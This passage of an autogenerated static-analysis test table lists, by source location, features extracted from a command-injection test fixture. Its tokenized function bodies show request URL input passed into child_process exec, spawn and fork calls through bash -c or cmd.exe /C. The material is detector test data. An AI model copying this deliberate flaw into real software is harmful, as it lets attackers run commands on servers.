cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:49 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:49 | url.par ... ry.path | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:19:6:23 | parse | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:19:6:23 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:19:6:23 | parse | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:19:6:23 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:19:6:23 | parse | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:27 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:27 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:27 | req | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:27 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:27 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:25:6:31 | req.url | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:29:6:31 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:29:6:31 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:29:6:31 | url | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:29:6:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:29:6:31 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:34:6:37 | true | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:40:6:44 | query | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:40:6:44 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:40:6:44 | query | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:40:6:44 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:40:6:44 | query | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:46:6:49 | path | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:46:6:49 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:46:6:49 | path | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:46:6:49 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:46:6:49 | path | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:11 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:11 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:11 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:11 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:11 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | cp.exec("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | cp.exec("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | cp.exec("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | cp.exec("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | cp.exec("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | exceptional return of cp.exec("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | exceptional return of cp.exec("foo") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | exceptional return of cp.exec("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | exceptional return of cp.exec("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | exceptional return of cp.exec("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:8:8:11 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:8:8:11 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:8:8:11 | exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:8:8:11 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:8:8:11 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:13:8:17 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:15 | cp.execSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:15 | cp.execSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:15 | cp.execSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:15 | cp.execSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:15 | cp.execSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | cp.execSync("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | cp.execSync("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | cp.execSync("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | cp.execSync("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | cp.execSync("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | exceptional return of cp.execSync("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | exceptional return of cp.execSync("foo") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | exceptional return of cp.execSync("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | exceptional return of cp.execSync("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | exceptional return of cp.execSync("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:8:9:15 | execSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:8:9:15 | execSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:8:9:15 | execSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| 